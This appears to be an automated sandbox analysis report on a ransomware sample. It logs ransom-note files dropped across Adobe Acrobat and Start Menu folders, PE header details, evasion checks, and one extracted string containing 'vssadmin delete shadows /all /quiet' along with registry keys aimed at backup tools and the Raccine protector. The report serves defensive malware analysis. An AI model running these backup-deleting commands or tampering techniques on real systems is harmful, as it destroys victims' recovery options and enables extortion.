Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txt
Source: 2b7cu0KwZl.exe, Static PE information: Image base 0x140000000 > 0x60000000
Source: 2b7cu0KwZl.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2b7cu0KwZl.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2b7cu0KwZl.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2b7cu0KwZl.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2b7cu0KwZl.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2b7cu0KwZl.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2b7cu0KwZl.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 2b7cu0KwZl.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2b7cu0KwZl.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2b7cu0KwZl.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2b7cu0KwZl.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2b7cu0KwZl.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: 2b7cu0KwZl.exe, Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\All Users\Start Menu\Programs\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\user\Start Menu\Programs\Accessibility\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\user\Start Menu\Programs\Accessories\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\user\Start Menu\Programs\System Tools\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File created: C:\Documents and Settings\user\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 2520, Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 396, Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File opened: C:\Documents and Settings\user\Local Settings\Adobe\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File opened: C:\Documents and Settings\user\Local Settings\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File opened: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Process token adjusted: Debug
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformationJump to behavior
